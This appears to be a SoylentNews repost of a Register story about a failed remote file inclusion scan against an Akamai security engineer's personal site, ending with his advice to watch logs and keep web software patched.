If You Try to Pwn a Website, Make Sure It's Not the Personal Domain of a Security Researcher
upstart writes:
Submitted via IRC for Bytram
Think you have bad luck? Imagine being the script kiddie who inadvertently tried and failed to pwn an Akamai security pro.
Larry Cashdollar, a senior security response engineer at the US-based global web giant, told us late last week he just recently noticed something peculiar in the logs on his personal website. Further investigation turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.
[...] He told The Register his site's logs showed the would-be attacker probing for RFI holes that would allow them to trick web applications into fetching and running a remote malicious script. In this case, the scumbag was trying, unsuccessfully, to load a file via a custom tool Cashdollar had created for his site.
"Based on my log entries they appear to be parsing web sites looking for form variables and automatically testing if those variables allow remote file inclusion," Cashdollar told El Reg.
"It's a generic test against any website where they can parse out the form input variable and then supply a URL to that variable to see if the content is included and executed."
Unfortunately for the attacker, Cashdollar also used the logs to follow the GET requests to the payload the attacker was trying to load: a script that attempted to harvest information about his server. By dissecting that and other files the hacker had ready to execute commands and take over vulnerable websites, Cashdollar was also able to extract the criminal's email address and their preferred language - Portuguese.
[...] The Akamai security engineer told El Reg that, for admins, the big takeaway from his experience is the importance of watching logs, patching site management tools, and writing web code that cannot be exploited for RFI.
"Make sure their application patches are up to date," Cashdollar advised. "Keep track of any new vulnerabilities discovered in software they're using for content management and site delivery and patch when new vulnerabilities are disclosed by the vendor."
Read more of this story at SoylentNews.